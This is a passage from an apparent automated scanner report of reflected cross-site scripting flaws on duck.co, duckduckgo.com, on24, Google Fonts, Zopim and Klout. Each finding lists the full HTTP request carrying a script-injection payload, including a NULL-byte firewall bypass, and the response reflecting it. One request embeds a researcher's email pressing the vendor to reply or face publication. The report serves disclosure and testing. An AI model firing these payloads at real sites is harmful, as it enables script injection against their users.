Set-Cookie: JSESSIONID=DA8D1BC3858EA1A193E9B89F7A8CE464; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:42 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/q-html-entities?4fa68"><script>alert(1)</script>073136e6f64=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.78. http://duck.co/topic/searching-for-roommates-on-craigslist [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/searching-for-roommates-on-craigslist

Request

GET /topic/searching-for-roommates-on-craigslist?4773d"><script>alert(1)</script>d0df6064d55=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0AB749E754F41962FC0E1FE4FCF99C9B; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:35 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/searching-for-roommates-on-craigslist?4773d"><script>alert(1)</script>d0df6064d55=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.79. http://duck.co/topic/spam-site-found [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/spam-site-found

Request

GET /topic/spam-site-found?8dfd1"><script>alert(1)</script>2034ae4d0ac=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0AF19D151D1F54E1DAB65D1A15B73EDE; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:48:27 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/spam-site-found?8dfd1"><script>alert(1)</script>2034ae4d0ac=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.80. http://duck.co/topic/userscript-which-prevents-you-from-accidentally-posting-as-guest [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/userscript-which-prevents-you-from-accidentally-posting-as-guest

Request

GET /topic/userscript-which-prevents-you-from-accidentally-posting-as-guest?70d99"><script>alert(1)</script>a95a7f3faab=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E821B1976D5AD47B8C3E5840FFC29986; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:31 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/userscript-which-prevents-you-from-accidentally-posting-as-guest?70d99"><script>alert(1)</script>a95a7f3faab=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.81. http://duck.co/topic/want-more-visitors-ehh-needs-to-look-more-proffesional [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/want-more-visitors-ehh-needs-to-look-more-proffesional

Request

GET /topic/want-more-visitors-ehh-needs-to-look-more-proffesional?3f6b2"><script>alert(1)</script>e1ce290b314=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=149B5ACDBAC8ECD5A3AD192855EF01F6; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:48:38 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/want-more-visitors-ehh-needs-to-look-more-proffesional?3f6b2"><script>alert(1)</script>e1ce290b314=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.82. http://duck.co/topic/words-to-live-by [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/words-to-live-by

Request

GET /topic/words-to-live-by?7bca3"><script>alert(1)</script>3db6225d9d=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=2E7B41A2D46440EF7AADA9200033F848; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:39 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/words-to-live-by?7bca3"><script>alert(1)</script>3db6225d9d=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.83. http://duck.co/topic/wot-highlighting [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/wot-highlighting

Request

GET /topic/wot-highlighting?46a5e"><script>alert(1)</script>a597b698c68=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=7FEBD9395486DE8A8C73005231D99BFD; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:42 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/wot-highlighting?46a5e"><script>alert(1)</script>a597b698c68=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.84. http://duckduckgo.com/d.js [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /d.js

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /d.js?q=labor%20day&l=us-en&p=1&s=0fd848%3balert(1)//50b232c4064 HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=labor+day
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:00:25 GMT
Content-Type: application/x-javascript; charset=UTF-8
Connection: keep-alive
Expires: Tue, 01 Mar 2011 02:00:24 GMT
Cache-Control: no-cache
Content-Length: 10225

var dnd0fd848;alert(1)//50b232c4064=[{"a":"<b>Labor</b> <b>Day</b> is a United States federal holiday observed on the first Monday in...The first <b>Labor</b> <b>Day</b> in the United States was obser
...[SNIP]...

3.85. http://duckduckgo.com/ie/v1/api/oembed [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /ie/v1/api/oembed

Request

GET /ie/v1/api/oembed?urls=http://www.amazon.com/Labor-Day-Novel-Joyce-Maynard/dp/0061843415?tag=duckduckgo-d-20&maxwidth=600&format=json&callback=nreb7f9b0<script>alert(1)</script>8507e3cbdcf&wmode=window HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=labor+day
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:04:46 GMT
Content-Type: application/json
Connection: keep-alive
Content-Length: 4284
Etag: "38f10b9f04d62850a2a65097544421170720cecb"

nreb7f9b0<script>alert(1)</script>8507e3cbdcf([{"provider_url": "http://www.amazon.com", "description": "Amazon.com: Labor Day: A Novel (P.S.) (9780061843419): Joyce Maynard: Books", "title": "Labor Day: A Novel (P.S.)", "url": "http://www.amazon
...[SNIP]...

3.86. http://duckduckgo.com/ie/v1/api/oembed [maxwidth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /ie/v1/api/oembed

Request

GET /ie/v1/api/oembed?urls=http://www.amazon.com/Labor-Day-Novel-Joyce-Maynard/dp/0061843415?tag=duckduckgo-d-20&maxwidth=60074352<script>alert(1)</script>f9cc82e6622&format=json&callback=nreb&wmode=window HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=labor+day
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:02:35 GMT
Content-Type: application/json
Connection: keep-alive
Content-Length: 237
Etag: "0d7ad701c72dca3be3b9f6e55a30464277b6dae3"

nreb([{"url": "http://www.amazon.com/Labor-Day-Novel-Joyce-Maynard/dp/0061843415?tag=duckduckgo-d-20", "error_code": 400, "error_message": "Invalid \"maxwidth\" parameter: 60074352<script>alert(1)</script>f9cc82e6622", "type": "error"}])

3.87. http://duckduckgo.com/ie/v1/api/oembed [urls parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /ie/v1/api/oembed

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ie/v1/api/oembed?urls=http://www.amazon.com/Labor-Day-Novel-Joyce-Maynard/dp/0061843415?tag=duckduckgo-d-20%00f860f<script>alert(1)</script>6c0fb59df07&maxwidth=600&format=json&callback=nreb&wmode=window HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=labor+day
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:01:10 GMT
Content-Type: application/json
Connection: keep-alive
Content-Length: 4431
Etag: "3c94481d6ac9a4e9cf563571613b25c7de20be99"

nreb([{"provider_url": "http://www.amazon.com", "description": "Amazon.com: Labor Day: A Novel (P.S.) (9780061843419): Joyce Maynard: Books", "title": "Labor Day: A Novel (P.S.)", "url": "http://www.a
...[SNIP]...
<a href=\"http://www.amazon.com/Labor-Day-Novel-Joyce-Maynard/dp/0061843415?tag=duckduckgo-d-20\u0000f860f<script>alert(1)</script>6c0fb59df07\">
...[SNIP]...

3.88. http://duckduckgo.com/iq/v1/twitter/cloudscan/services.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /iq/v1/twitter/cloudscan/services.json

Request

GET /iq/v1/twitter/cloudscan/services.json?callback=nrqwc0e0f<script>alert(1)</script>06b651e61e6&request_id=r1-1 HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=cloudscan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:01:10 GMT
Content-Type: application/json; charset=utf-8
Connection: keep-alive
X-Mashery-Responder: proxyworker-eu-i-cd6d64b9.mashery.com
Etag: "c1f1907da906622eeb6b54534f66ee95"
Cache-Control: max-age=0, private, must-revalidate
X-Frame-Options: DENY
Set-Cookie: _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlZGYwNWJhNDA1ZjU5YzNlYjU5YTg2YmYzM2M4NGZjZmU%3D--822e80b66e52ed75bf4f919c7814336667e9e4c5; path=/; HttpOnly
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Ua-Compatible: IE=Edge,chrome=1
X-Runtime: 0.009354
Accept-Ranges: bytes
Content-Length: 380

nrqwc0e0f<script>alert(1)</script>06b651e61e6({"services":[{"type":"twitter","url":"http://twitter.com/cloudscan","username":"cloudscan"},{"type":"blogger","url":"http://cloudscan.blogspot.com/","username":"cloudscan"},{"type":"klout","url":"http
...[SNIP]...

3.89. http://duckduckgo.com/iq/v1/twitter/cloudscan/services.json [request_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /iq/v1/twitter/cloudscan/services.json

Request

GET /iq/v1/twitter/cloudscan/services.json?callback=nrqw&request_id=r1-135ecf<script>alert(1)</script>dd5222ad637 HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=cloudscan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:01:59 GMT
Content-Type: application/json; charset=utf-8
Connection: keep-alive
X-Mashery-Responder: proxyworker-eu-i-b76f66c3.mashery.com
Etag: "5d6aa27ef217e228a9dae61829d78b76"
Cache-Control: max-age=0, private, must-revalidate
X-Frame-Options: DENY
Set-Cookie: _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlZmU0NDI2NGE5MDM2ODI5ZmE0YWQzZGRkZDRlNGY5MmQ%3D--f32a273e9458140e43394d39ba612c9b3fefba08; path=/; HttpOnly
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Ua-Compatible: IE=Edge,chrome=1
X-Runtime: 0.010260
Accept-Ranges: bytes
Content-Length: 380

nrqw({"services":[{"type":"twitter","url":"http://twitter.com/cloudscan","username":"cloudscan"},{"type":"blogger","url":"http://cloudscan.blogspot.com/","username":"cloudscan"},{"type":"klout","url":"http://klout.com/cloudscan","username":"cloudscan"}],"public_url":"http://qwerly.com/twitter/cloudscan","request_id":"r1-135ecf<script>alert(1)</script>dd5222ad637","status":200})

3.90. https://duckduckgo.com/e.js [go parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /e.js

Request

GET /e.js?from=h02332%40gmail.com&body=Hoyt+LLC+Research+investigates+and+reports+on+security+vulnerabilities+embedded+in+Web+Applications+and+Products+used+in+wide-scale+deployment.+%0D%0A%0D%0ADisclosure+Info+%40+URI+http%3A%2F%2Fwww.cloudscan.me%2Fp%2Fhoyt-llc-research-vulnerability.html%0D%0A%0D%0AHello+-+David+Hoyt+here+with+Hoyt+LLC+Research+in+Boston%2C+MA+with+a+Private+Vuln+Report.+You%27ve+got+XSS%2C+everywhere...+everywhere..+%0D%0A%0D%0AE-mail+me+back+at+h02332%40gmail.com+quickly+if+you+don%27t+wants+this+published+at+URI+http%3A%2F%2Fxss.cx%2Fi%2Fduck.co-xss-1.jpg+and+http%3A%2F%2Fxss.cx%2Fi%2Fduckduckgo.com-xss-1.jpg%0D%0A%0D%0ABest%3B%0D%0A%0D%0ADavid%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A&copy=on&go=b22ea"><script>alert(1)</script>5eb08d60423fdb9ed HTTP/1.1
Host: duckduckgo.com
Connection: keep-alive
Referer: http://duckduckgo.com/feedback.html
Cache-Control: max-age=0
Origin: http://duckduckgo.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:17:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Sun, 12 Nov 1999 20:28:05 GMT
Content-Length: 1425

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="robots" content="no
...[SNIP]...
<a href="b22ea"><script>alert(1)</script>5eb08d60423fdb9ed">
...[SNIP]...

3.91. https://event.on24.com/eventRegistration/EventLobbyServlet [key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://event.on24.com
Path:   /eventRegistration/EventLobbyServlet

Request

GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542954f9"><x%20style%3dx%3aexpression(alert(1))>935c7211ee2&partnerref=ocom&sourcepage=register HTTP/1.1
Host: event.on24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:29:57 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=rTgXMMJ19hpxRmQBeHTZpBSHLmdhQwpUS9D079bkV7zEURAZjdB9!865718048; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close


<!-- optional parameters
cb            : leave blank to hide logo, or pass in appropriate cb value
topmargin        - default is 20
leftmargin        
...[SNIP]...
<input type="hidden" name="key" value="453849B62CAB589517473EC368BF9542954f9"><x style=x:expression(alert(1))>935c7211ee2">
...[SNIP]...

3.92. https://event.on24.com/eventRegistration/EventLobbyServlet [partnerref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://event.on24.com
Path:   /eventRegistration/EventLobbyServlet

Request

GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542&partnerref=ocom99c8f"><x%20style%3dx%3aexpression(alert(1))>81a40639315&sourcepage=register HTTP/1.1
Host: event.on24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:08 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=7cDI022cgrDsLBgCWczqE6wL9UAd4cjBPhMG2cmQDAsmDcV7RZYq!-1586332666; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close


<!-- optional parameters
cb            : leave blank to hide logo, or pass in appropriate cb value
topmargin        - default is 20
leftmargin        
...[SNIP]...
<input type="hidden" name="partnerref" value="ocom99c8f"><x style=x:expression(alert(1))>81a40639315">
...[SNIP]...

3.93. https://event.on24.com/eventRegistration/EventLobbyServlet [sourcepage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://event.on24.com
Path:   /eventRegistration/EventLobbyServlet

Request

GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542&partnerref=ocom&sourcepage=registerab0db"><x%20style%3dx%3aexpression(alert(1))>113da7be2a3 HTTP/1.1
Host: event.on24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:17 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=62BqOkDMbxlMQz6LJa9JVd0qcMfDA1sqzBfibypGJraqoBW2Rf32!-1281997819; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close


<!-- optional parameters
cb            : leave blank to hide logo, or pass in appropriate cb value
topmargin        - default is 20
leftmargin        
...[SNIP]...
<input type="hidden" name="sourcepage" value="registerab0db"><x style=x:expression(alert(1))>113da7be2a3">
...[SNIP]...

3.94. http://fonts.googleapis.com/css [family parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.googleapis.com
Path:   /css

Request

GET /css?family=Droid+Sansdf90e<script>alert(1)</script>fe1972324d9 HTTP/1.1
Host: fonts.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.ubermedia.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=UTF-8
Expires: Tue, 01 Mar 2011 13:16:19 GMT
Date: Tue, 01 Mar 2011 13:16:19 GMT
Cache-Control: private, max-age=86400
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 124

/* Droid Sansdf90e<script>alert(1)</script>fe1972324d9 (style: normal, weight: 400) is not available */
/* Not supported. */

3.95. http://init.zopim.com/register [mID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://init.zopim.com
Path:   /register

Request

GET /register?swfVer=2371&sk=4300947c68314c1251174fbec281db2c179656ed&ua=Mozilla%2F5%2E0%20%28Windows%3B%20U%3B%20Windows%20NT%206%2E1%3B%20en%2DUS%29%20AppleWebKit%2F534%2E13%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F9%2E0%2E597%2E98%20Safari%2F534%2E13&jsVer=0%2E4%2E0&mID=gLAMf6t1oQdRZ9pJbWZsb367xnR0jSnYeb22e<script>alert(1)</script>85708136ac4ac84a6&ref=http%3A%2F%2Fwww%2Ethedetroitbureau%2Ecom%2Fabout%2Dus%2F&tabId=%5Fflash%5F28853bf0ac29099fa00d4de19cf16898206ee90c&accountKey=zNGIkGNBzGwfX48wS7PchwQECOzEXOCT&ak=zNGIkGNBzGwfX48wS7PchwQECOzEXOCT&title=SEO%20Company%20USA%2C%20Michigan%20Web%20Design%20Services%2C%20Print%20Design%2C%20Flash%20Designing%2C%20Website%20design%20Companies%20Novi%2C%20E%2DCommerce%20Designer&url=http%3A%2F%2Fwww%2Esti%2Dcs%2Ecom%2F HTTP/1.1
Host: init.zopim.com
Proxy-Connection: keep-alive
Referer: http://zopim.com/swf/ZClientController.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 26 Feb 2011 20:42:18 GMT
Connection: keep-alive
Content-Length: 856

{"status": "offline", "__status": "ok", "name": "Visitor 210780399", "settings": {"chatbutton": {"position": "br", "theme": "bar"}, "greetings": {"away": {"window": "If you leave a question or comment
...[SNIP]...
Leave a message"}, "online": {"window": "Leave a question or comment and our agents will try to attend to you shortly =)", "bar": "Click here to chat"}}}, "machineID": "gLAMf6t1oQdRZ9pJbWZsb367xnR0jSnYeb22e<script>alert(1)</script>85708136ac4ac84a6", "nick": "visitor:210780399", "host": "lc03.zopim.com", "chat": {"members": [], "history": []}, "sid": "dFAqD1Ku9sANzup4iVjoZlanIFmiEk6o8QAQLwDi", "evt": 0, "email": ""}

3.96. http://klout.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://klout.com
Path:   /

Request

GET /?4facd"><script>alert(1)</script>8ccd61759dc=1 HTTP/1.1
Host: klout.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 02:08:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: arrival_cookie=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; expires=Wed, 02-Mar-2011 02:08:00 GMT; path=/; domain=.klout.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 20038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Standard for
...[SNIP]...
<a id="signup_button" href="/auth/login?prev_page=/?4facd"><script>alert(1)</script>8ccd61759dc=1">
...[SNIP]...

3.97. http://klout.com/business [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://klout.com
Path:   /business

Request

GET /business?1d94c"><script>alert(1)</script>9392973573e=1 HTTP/1.1
Host: klout.com
Proxy-Connection: keep-alive
